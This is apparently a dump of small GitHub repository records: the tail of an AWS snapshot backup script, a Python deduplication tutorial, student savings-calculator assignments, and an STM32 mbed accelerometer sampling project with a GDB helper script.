self.log_snapshots_created.keys():\n self.logger.info(each)\n try:\n for each in self.log_snapshots_to_delete.keys():\n self.logger.info(each)\n except:\n pass\n self.logger.info(\"AWS snapshot script -----------------> Complete: \" + datetime.now().strftime(\"%m-%d-%Y %H:%M:%S\"))\n\n def main(self):\n print \"Filter key: %s\" % self.options.key\n print \"Filter tag: %s \" % self.options.tag\n self.getInstancesFull()\n self.takeSnapshotsFull()\n self.getSnapshotsFull()\n self.reportBackup()\n\ndef parseit():\n parser = OptionParser()\n parser.add_option(\"-a\", \"--all\", action=\"store\", dest=\"all\", default=\"default\",\n \t\t help=\"Makes a backup of all found volumes that are in use.\")\n parser.add_option(\"-p\", \"--profile\", action=\"store\", dest=\"profile\", default=\"default\",\n \t\t help=\"The INI profile to select. Reads profiles from ~/.aws/credentials\")\n parser.add_option(\"-k\", \"--key\", action=\"store\", dest=\"key\", default=\"Environment\",\n \t\t help=\"The tag key. Defaults to Environment.\")\n parser.add_option(\"-m\", \"--max\", action=\"store\", dest=\"max\", default=\"3\",\n \t\t help=\"Maximum snapshots to keep. Defaults to 3.\")\n parser.add_option(\"-t\", \"--tag\", action=\"store\", dest=\"tag\", default=\"default\",\n \t\t help=\"The tag value. Defaults to default.\")\n (options, args) = parser.parse_args()\n profile = ConfigParser()\n try:\n profile.read(os.path.expanduser('~/.aws/credentials'))\n except:\n print \"Missing AWS credentials file. Exiting.\"\n parser.print_help()\n try:\n profile.get(options.profile, 'aws_access_key_id')\n profile.get(options.profile, 'aws_secret_access_key')\n except:\n print \"Profile %s doesn't exist. Exiting.\" % options.profile\n parser.print_help()\n\n return (options, args, profile)\n\ndef run():\n (options, args, profile) = parseit()\n x = AwsBackups(options, args, profile)\n x.main()\n\nif __name__=='__main__':\n run()\n"
}
] | 3 |
liuxinxin885/Thecommonlyusedskill
|
https://github.com/liuxinxin885/Thecommonlyusedskill
|
db9ba9b1b18b353bbfec0fb74284e88cd0141cf6
|
3bb165e0e205ce135ed769d3aac12eb086b05e9c
|
94aa6e6cb5beafd3bf641c8cc75e058a6551055a
|
refs/heads/master
| 2022-11-30T12:23:56.781290 | 2020-07-30T01:37:52 | 2020-07-30T01:37:52 | 283,641,114 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5410256385803223,
"alphanum_fraction": 0.6230769157409668,
"avg_line_length": 22.399999618530273,
"blob_id": "f26d233017e58f2d2f54c0210647c01e46092e7d",
"content_id": "683b4b4d6d44faecb4684e6e7d52672969e828c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1324,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 50,
"path": "/去重.py",
"repo_name": "liuxinxin885/Thecommonlyusedskill",
"src_encoding": "UTF-8",
"text": "# @Time : 2020/7/30 0030 9:26 \n# @Author : liuxinxin885\n# @File : 去重.py \n# @Software: PyCharm\n# 对列表去重\n# 循环查找\nli = [1,2,3,3,4,2,3,4,5,6,1]\nnews_li = []\nfor i in li:\n if i not in news_li:\n news_li.append(i)\nprint (news_li)\n# 使用集合的特性\nli1 = [1,4,3,3,4,2,3,4,5,6,1]\nnew_li1 = list(set(li1))\n# .使用itertools模块的grouby方法\nimport itertools\nli2 = [1,4,3,3,4,2,3,4,5,6,1]\nli2.sort() # 排序\nit = itertools.groupby(li2)\nfor k, g in it:\n print (k)\n# 使用while循环遍历\ndef quchong(lb):\n for x in lb:\n while lb.count(x)>1:\n del lb[lb.index(x)]\n return lb\nli3 = [1,4,3,3,4,2,3,4,5,6,1]\nprint(quchong(li3))\n# 使用keys()\nli4 = [1,0,3,7,7,5]\nformatli = list({}.fromkeys(li4).keys())\nprint (formatli)\n# 对数据框去重\n# 用unique()对单属性列去重\nimport pandas as pd\ndata = {'id':['A','B','C','C','C','A','B','C','A'],'age':[18,20,14,10,50,14,65,14,98]}\ndata = pd.DataFrame(data)\ndata.id.unique()\n#或者\nimport numpy as np\nnp.unique(data.id)\n# 用frame.drop_duplicates()对单属性列去重\ndata.drop_duplicates(['id'])\n# 用frame.drop_duplicates()对多属性列去重\ndata.drop_duplicates(['id','age'])\n# 用frame.duplicated()对多属性列去重\nisduplicated = data.duplicated(['id','age'],keep='first')\ndata.loc[~isduplicated,:]\n"
}
] | 1 |
msg2fahd/pipeline_2
|
https://github.com/msg2fahd/pipeline_2
|
4b2b4fc95c2255abd21debce260186c3d927fadd
|
746183776950a2531f2a5de76854e1e0e6b193fb
|
f8b5b1ede55954c5df54c8b9099708eb30d0b9ef
|
refs/heads/master
| 2023-01-21T19:27:01.665457 | 2020-11-23T05:09:09 | 2020-11-23T05:09:09 | 315,205,464 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5636363625526428,
"alphanum_fraction": 0.6363636255264282,
"avg_line_length": 10,
"blob_id": "82f9955fcba66377376ed890308da803ffae06ed",
"content_id": "cf95ae800f66413d7c342277d45daa3d51260fe6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 55,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 5,
"path": "/test.py",
"repo_name": "msg2fahd/pipeline_2",
"src_encoding": "UTF-8",
"text": "a=10\nb=30\nc=a+b\nprint(c)\nprint('i am from test area.')\n"
},
{
"alpha_fraction": 0.692307710647583,
"alphanum_fraction": 0.692307710647583,
"avg_line_length": 26,
"blob_id": "299498f840e6f51867864f418b37b62d5eee5a9c",
"content_id": "9e35f4c89ba08e1b357b09897d9515a4f4485387",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 26,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 1,
"path": "/build.sh",
"repo_name": "msg2fahd/pipeline_2",
"src_encoding": "UTF-8",
"text": "echo ' hi i am build file'"
}
] | 2 |
bilalahmad1994/DataScienceBootCamp_NED
|
https://github.com/bilalahmad1994/DataScienceBootCamp_NED
|
47620151323744aab3b783541ace52f42be59a3b
|
a919a20f794b1047969002b8ae7b85b45eb6ebab
|
1f865aab43a665d1d8eb5587f4de753f0d2e0bd4
|
refs/heads/master
| 2021-07-20T16:22:33.081387 | 2017-10-30T21:43:19 | 2017-10-30T21:43:19 | 108,859,845 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7067092657089233,
"alphanum_fraction": 0.7456868886947632,
"avg_line_length": 25.982759475708008,
"blob_id": "651e7dc6321b82e41a0a0742a6915df21aa2e81b",
"content_id": "b207b34e78045aaa8def3ce92baf228b26ab2cf2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1565,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 58,
"path": "/assignment module1/ps1a.py",
"repo_name": "bilalahmad1994/DataScienceBootCamp_NED",
"src_encoding": "UTF-8",
"text": "# we have to calculate downpayment cost not total cost with downpayment\n\n# enter your dream house that u want to buy\ntotalcost=float(input(\"enter cost of your dream house\"))\n# enter the percent that you saved from salary e,g 5%=0.05\nportionsaved=float(input(\"enter the percent salary to save as a decimal\")) #\n# enter your annual salary\nannualsalary=float(input(\"enter ur annual salary\"))\n\n# monthly salary 120000 will calculate 10000 per month\nmonthly_salary=float(annualsalary /12)\n# current saving in month 0\ncurrentsaving=float(0)\n# downpayment 0.25*120000\ndownpayment=0.25*totalcost\n# annual return that you saved from annual salary means 4%\nannual_return=0.04\nsavingannualsalary= annual_return/ 12\n\n# monthlysaved=monthly_salary*0.1\n\nmonthly=0\nwhile currentsaving < downpayment:\n monthly +=1\n monthlyreturn=(currentsaving*savingannualsalary)\n currentsaving=currentsaving+(monthlyreturn+monthly_salary*portionsaved)\nprint(\"number of month\",monthly)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# annual_salary=float(input(\"Enter your annual salary: \"))\n# portion_saved=float(input(\"Enter the percent of your salary to save, as a decimal: \"))\n# total_cost=float(input(\"Enter the cost of your dream home: \"))\n# portion_down_payment=0.25*total_cost\n# current_savings=float(0)\n# monthly_salary=float(annual_salary/12)\n# r=0.04\n# rate=0.04/12\n# monthly_savings=monthly_salary*0.1\n# m=0\n# while current_savings < portion_down_payment:\n# returns = (current_savings * r / 12)\n# current_savings = current_savings + ( returns + monthly_salary*portion_saved )\n# m+=1\n# print(m)\n"
},
{
"alpha_fraction": 0.7219020128250122,
"alphanum_fraction": 0.7579250931739807,
"avg_line_length": 33.650001525878906,
"blob_id": "e94d098dc05788702a16ec14c00ae1c939e48a58",
"content_id": "865d860c406dcdbc94b8ad0e7ddf1d11824b1f49",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1388,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 40,
"path": "/assignment module1/ps1b.py",
"repo_name": "bilalahmad1994/DataScienceBootCamp_NED",
"src_encoding": "UTF-8",
"text": "# we have to calculate downpayment cost not total cost with downpayment\n\n# enter your dream house that u want to buy\ntotalcost=float(input(\"enter cost of your dream house\"))\n# enter the percent that you saved from salary e,g 5%=0.05\nportionsaved=float(input(\"enter the percent salary to save as a decimal\")) #\n# enter your annual salary\nannualsalary=float(input(\"enter ur annual salary\"))\n\n#enter the value in percentage how ur salary\nannualsalaryinc=float(input(\"enter ur semi annual raise after 6months incremenr\"))\n\n\n# monthly salary 120000 will calculate 10000 per month\nmonthly_salary=float(annualsalary /12)\n# current saving in month 0\ncurrentsaving=float(0)\n# downpayment 0.25*120000\ndownpayment=0.25*totalcost\n# annual return that you saved from annual salary means 4%\nannual_return=0.04\nsavingannualsalary= annual_return/ 12\n\n# monthlysaved=monthly_salary*0.1\n\nmonthly=0\nwhile currentsaving < downpayment:\n monthly +=1\n monthlyreturn=(currentsaving*savingannualsalary)\n currentsaving=currentsaving+(monthlyreturn+monthly_salary*portionsaved)\n\n\n if monthly%6==0:\n annualsalary+=annualsalary * annualsalaryinc\n print('number of months after increment in 6',monthly)\n # elif monthly % 12==0:\n # annualsalary = annualsalary * annualsalaryinc\n # print('number of months after increment in 12',monthly)\n\n# print(\"number of month\",monthly)\n\n\n"
},
{
"alpha_fraction": 0.6645161509513855,
"alphanum_fraction": 0.7204301357269287,
"avg_line_length": 25.514286041259766,
"blob_id": "6c6db217ccb82b46a322e33684c9b03c55d4f26e",
"content_id": "91e033a903c44c37430e51215798d31c4544c61c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 930,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 35,
"path": "/assignment module1/ps1c.py",
"repo_name": "bilalahmad1994/DataScienceBootCamp_NED",
"src_encoding": "UTF-8",
"text": "annualsalary=150000\nsemi_annual_raise=0.07\nannual_return=0.04\ndownpayment=0.25*annualsalary\ncosthouse=1000000\nmonthsalary=annualsalary/12\ncurrentsaving=0\nminrate=int(0)\nmaxrate=input(1000)\nsav_annualsalary=annual_return/12\nportion_downpayment= costhouse * 0.25\nmonthlysalary=float(annualsalary/12)\nportionsaved=float((maxrate-minrate)/2)\nmonthly=0\n\n\n\nwhile(currentsaving<downpayment):\n monthly+= 1\n monthlyreturn = (currentsaving * monthsalary)\n currentsaving = currentsaving + (monthlyreturn + monthlysalary * portionsaved)\n\n for i in range(1,37):\n if monthly % 6 == 0:\n annualsalary += annualsalary * semi_annual_raise\n\n if currentsaving < portion_downpayment:\n maxrate = portionsaved\n else:\n high = portionsaved\n portion_saved = (maxrate + minrate) / 20000.0\n monthly += 1\n\n print(\"Best savings rate: \", portionsaved)\n print(\"Steps in bisection search\", monthly)\n\n\n"
}
] | 3 |
elken/SOFT253_referral
|
https://github.com/elken/SOFT253_referral
|
c5d6d621aa5bf7fa29fc9aaa923d9966b52062ef
|
220ba11d444881a8a11100735ec31643d30096b8
|
11050fb7d58504177a658d83f303b1672145455f
|
refs/heads/master
| 2021-01-19T11:14:46.669074 | 2016-08-02T18:15:05 | 2016-08-02T18:15:05 | 63,878,700 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5645161271095276,
"alphanum_fraction": 0.5645161271095276,
"avg_line_length": 30,
"blob_id": "86f20bf64df9527c778b857ef2449e51f08f1797",
"content_id": "ea76acea248ddecb6d7a1e746dc30d532d48b3b3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 62,
"license_type": "permissive",
"max_line_length": 50,
"num_lines": 2,
"path": "/scripts/watch.sh",
"repo_name": "elken/SOFT253_referral",
"src_encoding": "UTF-8",
"text": "#! /bin/sh\nfswatch -o src/ | xargs -I {} ./scripts/copy.sh {}\n"
},
{
"alpha_fraction": 0.5789473652839661,
"alphanum_fraction": 0.5789473652839661,
"avg_line_length": 8.5,
"blob_id": "51460ba06045c67001ad461bb9835b23d1630234",
"content_id": "4e15748fb594293ab6a6e59ba0f898a97f10ea2a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 19,
"license_type": "permissive",
"max_line_length": 10,
"num_lines": 2,
"path": "/scripts/copy.sh",
"repo_name": "elken/SOFT253_referral",
"src_encoding": "UTF-8",
"text": "#! /bin/sh\npio run\n"
},
{
"alpha_fraction": 0.4318554997444153,
"alphanum_fraction": 0.46962234377861023,
"avg_line_length": 13.162790298461914,
"blob_id": "f4727963a103eebe5bec8e48ea2c2c04ece45d43",
"content_id": "e50453518d5b5ec913d09c09331e7950c8089ba0",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 609,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 43,
"path": "/src/data.hpp",
"repo_name": "elken/SOFT253_referral",
"src_encoding": "UTF-8",
"text": "#ifndef __DATA_H__\n#define __DATA_H__\n#include \"mbed.h\"\n\nclass Data {\n int32_t _x;\n int32_t _y;\n int32_t _z;\n\npublic:\n Data() : _x(0), _y(0), _z(0) {};\n Data(int32_t x, int32_t y, int32_t z) : _x(x), _y(y), _z(z) {};\n\n Data operator+ (const Data& rhs) {\n _x += rhs.x();\n _y += rhs.y();\n _z += rhs.z();\n\n return *this;\n }\n\n Data operator/ (int32_t divisor) {\n _x /= divisor;\n _y /= divisor;\n _z /= divisor;\n\n return *this;\n }\n\n int32_t x() const {\n return _x;\n }\n\n int32_t y() const {\n return _y;\n }\n\n int32_t z() const {\n return _z;\n }\n};\n\n#endif //__DATA_H__\n"
},
{
"alpha_fraction": 0.7725321650505066,
"alphanum_fraction": 0.7896995544433594,
"avg_line_length": 18.33333396911621,
"blob_id": "5d2bab07f098de0d040c863da63d85cbf3d04dcb",
"content_id": "8c7c599317b2c106579f73ca0d811fe58289612c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 233,
"license_type": "permissive",
"max_line_length": 39,
"num_lines": 12,
"path": "/scripts/gdb.py",
"repo_name": "elken/SOFT253_referral",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nfrom pyOCD.gdbserver import GDBServer\nfrom pyOCD.board import MbedBoard\n\nimport logging\nlogging.basicConfig(level=logging.INFO)\n\nboard = MbedBoard.chooseBoard()\n\n# start gdbserver\ngdb = GDBServer(board, 3333)\n\n"
},
{
"alpha_fraction": 0.714102566242218,
"alphanum_fraction": 0.75,
"avg_line_length": 27.851852416992188,
"blob_id": "f5332e43bf24ee9a25d9669fe11bbcef4c6f6c84",
"content_id": "505033e46e35261c4c9f89c9586be3fccea1f08b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 780,
"license_type": "permissive",
"max_line_length": 201,
"num_lines": 27,
"path": "/platformio.ini",
"repo_name": "elken/SOFT253_referral",
"src_encoding": "UTF-8",
"text": "\n# Project Configuration File\n#\n# A detailed documentation with the EXAMPLES is located here:\n# http://docs.platformio.org/en/latest/projectconf.html\n#\n\n# A sign `#` at the beginning of the line indicates a comment\n# Comment lines are ignored.\n\n# Simple and base environment\n# [env:mybaseenv]\n# platform = %INSTALLED_PLATFORM_NAME_HERE%\n# framework =\n# board =\n#\n# Automatic targets - enable auto-uploading\n# targets = upload\n\n\n# ST STM32 Platform\n[env:nucleo_f401re]\nplatform = ststm32\nframework = mbed\nboard = nucleo_f401re\nupload_port = /Volumes/NODE_F401RE\ntargets = upload\nbuild_flags = -I./lib/X_NUCLEO_IKS01A1/X_NUCLEO_COMMON/DevI2C -I./lib/X_NUCLEO_IKS01A1/Components/Common -I./lib/X_NUCLEO_IKS01A1/Components/Interfaces -I./lib/X_NUCLEO_IKS01A1/Components -std=c++11 -g\n"
},
{
"alpha_fraction": 0.665217399597168,
"alphanum_fraction": 0.6763118505477905,
"avg_line_length": 33.92146682739258,
"blob_id": "ade3fc42a1e8b834acfcc6c6067af1993832d4c9",
"content_id": "df96b3cc924ba76b2584a6d38add03bd87bea563",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 6670,
"license_type": "permissive",
"max_line_length": 208,
"num_lines": 191,
"path": "/src/main.cpp",
"repo_name": "elken/SOFT253_referral",
"src_encoding": "UTF-8",
"text": "/**\n ******************************************************************************\n * @file main.cpp\n * @author AST / EST\n * @version V0.0.1\n * @date 14-August-2015\n * @brief Simple Example application for using the X_NUCLEO_IKS01A1\n * MEMS Inertial & Environmental Sensor Nucleo expansion board.\n ******************************************************************************\n * @attention\n *\n * <h2><center>© COPYRIGHT(c) 2015 STMicroelectronics</center></h2>\n *\n * Redistribution and use in source and binary forms, with or without modification,\n * are permitted provided that the following conditions are met:\n * 1. Redistributions of source code must retain the above copyright notice,\n * this list of conditions and the following disclaimer.\n * 2. Redistributions in binary form must reproduce the above copyright notice,\n * this list of conditions and the following disclaimer in the documentation\n * and/or other materials provided with the distribution.\n * 3. Neither the name of STMicroelectronics nor the names of its contributors\n * may be used to endorse or promote products derived from this software\n * without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *\n ******************************************************************************\n\n\n HINTS:\n\n Use a Ticker for accurate sampling, but do NOT use printf or locks inside an ISR. Instead, use a MailBox to safely move data across from an ISR to a Thread\n Many functions in MBED are thread-safe - check the online docs\n\n For buffering, use an Array (of structures) and the producer-consumer pattern (or a variant of it).\n DO NOT use a mailbox or queue to perform the buffering\n\n Perform serial comms on another thread\n\n Beware of a thread running out of stack space. If you have to use a lot of local variable data, consider increasing the size of the stack for the respective thread. See the constructor for Thread in the docs\n\n In terms of diagnostics, consider the following type of information:\n\n An indication that the sampling is running (not every sample maybe, but a heart-beat type indication)\n An error if the buffer is full\n An warning if the buffer is empty\n Anything that helps diagnose a deadlock (e.g. output a message / toggle an LED before a lock is taken and after it is released)\n\n For high marks in the logging aspect, remember that although printf is thread safe (not interrupt safe), printf from multiple threads will result in interleaved text.\n To solve this, have a logging thread that queues up whole messages and write them to the serial interface one at a time - this is ambitious but can be done\n*/\n\n/* Includes */\n#include \"mbed.h\"\n#include \"rtos.h\"\n#include \"x_nucleo_iks01a1.h\"\n#include \"cmsis_os.h\"\n#include \"data.hpp\"\n\n#define DEBUG 0\n#define MAX_MESSAGES 16\n#define MAX_ITEMS 10\n#define CAPACITY (MAX_ITEMS + 1)\n\n/* Instantiate the expansion board */\nstatic X_NUCLEO_IKS01A1 *mems_expansion_board = X_NUCLEO_IKS01A1::Instance(D14, D15);\n\n/* Retrieve the composing elements of the expansion board */\nstatic MotionSensor *accelerometer = mems_expansion_board->GetAccelerometer();\n\nSerial pc(USBTX, USBRX);\n\n// Message struct for the message queue\nstruct Message {\n const char* message;\n};\n\nTicker ticker;\nMail<Data, MAX_ITEMS> dataMailBox;\nMail<Message, MAX_MESSAGES> messageBox;\nData samples[CAPACITY];\nint32_t sampleCount = 0;\nMutex* averageLock = new Mutex();\nSemaphore* logSemaphore = new Semaphore(MAX_MESSAGES);\n\n// Send a message to the message box\nvoid sendMessage(const char* msg) {\n logSemaphore->wait();\n Message* m = messageBox.calloc();\n m->message = msg;\n messageBox.put(m);\n}\n\n// Print all messages in the mailbox\nvoid printMessages(void const*) {\n while (true) {\n osEvent evt = messageBox.get(1000);\n if (evt.status == osEventMail) {\n Message* m = (Message*) evt.value.p;\n pc.printf(m->message);\n messageBox.free(m);\n }\n logSemaphore->release();\n }\n}\n\n// Sample data every 100ms, send error to log thread where applicable\nvoid sampleData() {\n int32_t axes[3];\n averageLock->lock();\n#if DEBUG\n sendMessage(\"Sample data got lock\\r\\n\");\n#endif\n accelerometer->Get_X_Axes(axes);\n Data* accelData = dataMailBox.alloc();\n\n accelData = new Data(axes[0], axes[1], axes[2]);\n osStatus status = dataMailBox.put(accelData);\n averageLock->unlock();\n#if DEBUG\n sendMessage(\"Sample data lost lock\\r\\n\");\n#endif\n\n if (status == osErrorResource) {\n#if DEBUG\n char message[50];\n sprintf(message, \"Resource not available (%4Xh)\\r\\n\", status);\n sendMessage(message);\n#endif\n }\n}\n\n/* Simple main function */\nint main() {\n#if DEBUG\n sendMessage(\"\\r\\n--- Starting new debug run---\\r\\n\");\n#else\n sendMessage(\"\\r\\n--- Starting new run---\\r\\n\");\n#endif\n\n\n#if DEBUG\n uint8_t id;\n accelerometer->ReadID(&id);\n char message[50];\n sprintf(message, \"LSM6DS0 Accelerometer = 0x%X\\r\\n\", id);\n sendMessage(message);\n#endif\n\n Thread logging(printMessages);\n ticker.attach(&sampleData, 0.1);\n\n while(1) {\n osEvent evt = dataMailBox.get();\n if (evt.status == osEventMail) {\n Data* mailData = (Data*) evt.value.p;\n samples[sampleCount] = *mailData;\n sampleCount = (sampleCount + 1) % CAPACITY;\n if (sampleCount == MAX_ITEMS) {\n averageLock->lock();\n Data averages;\n#if DEBUG\n sendMessage(\"Main got lock\\r\\n\");\n#endif\n for (int i = 0; i < MAX_ITEMS; i++) {\n averages = averages + samples[i];\n }\n averages = averages / 10;\n char message[64];\n sprintf(message, \"Average: \\tx: %ld\\t y: %ld\\t z: %ld\\r\\n\", averages.x(), averages.y(), averages.z());\n sendMessage(message);\n averages = Data();\n averageLock->unlock();\n#if DEBUG\n sendMessage(\"Main lost lock\\r\\n\");\n#endif\n }\n dataMailBox.free(mailData);\n sleep();\n }\n }\n}\n"
},
{
"alpha_fraction": 0.47756606340408325,
"alphanum_fraction": 0.49907806515693665,
"avg_line_length": 20.407894134521484,
"blob_id": "174fd46f9a8b874ec2a6b0f3aeb9ad3f4a76e6df",
"content_id": "836bc886d0106aaa1dc072fb83cd856b46632e02",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1627,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 76,
"path": "/src/Buffer.h",
"repo_name": "elken/SOFT253_referral",
"src_encoding": "UTF-8",
"text": "#include <atomic>\n#include <cstddef>\n\ntemplate <class T, int32_t m_capacity>\nclass Buffer {\n int32_t m_size;\n std::atomic<int32_t> m_head;\n std::atomic<int32_t> m_tail;\n\n T* m_data;\n\npublic:\n Buffer() : m_size(0), m_head(0), m_tail(0) {\n m_data = new T[m_capacity];\n }\n ~Buffer();\n\n int32_t size() {\n return m_size;\n }\n\n int32_t capacity() {\n return m_capacity;\n }\n\n bool push(T& item) {\n int32_t head = m_head.load(std::memory_order_relaxed);\n int32_t nextHead = (head + 1) % m_capacity;\n\n if (nextHead == m_tail.load(std::memory_order_acquire)) {\n return false;\n }\n\n m_data[head] = item;\n m_head.store(nextHead, std::memory_order_release);\n\n m_size++;\n return true;\n\n // if ((m_head == 0 && m_tail == m_capacity) || m_head == m_tail + 1) {\n // return false;\n // } else if (m_head == -1 && m_tail == -1) {\n // m_head = 0;\n // m_tail = 0;\n // m_data[m_head] = item;\n // m_size++;\n // } else if (m_tail == m_size) {\n // m_tail = 0;\n // m_data[m_tail] = item;\n // m_size++;\n // }\n }\n\n bool pop(T& item) {\n int32_t tail = m_tail.load(std::memory_order_relaxed);\n if (tail == m_head.load(std::memory_order_acquire)) {\n return false;\n }\n\n item = m_data[tail];\n m_tail.store((tail + 1) % m_capacity, std::memory_order_release);\n\n m_size--;\n return true;\n // T result = nullptr;\n // if (m_head == -1 && m_tail == -1) {\n // return result;\n // } else {\n // if (m_head == m_tail) {\n // m_data[m_head] = 0;\n // m_head = -1;\n // m_tail = -1;\n // }\n // }\n }\n};\n"
}
] | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.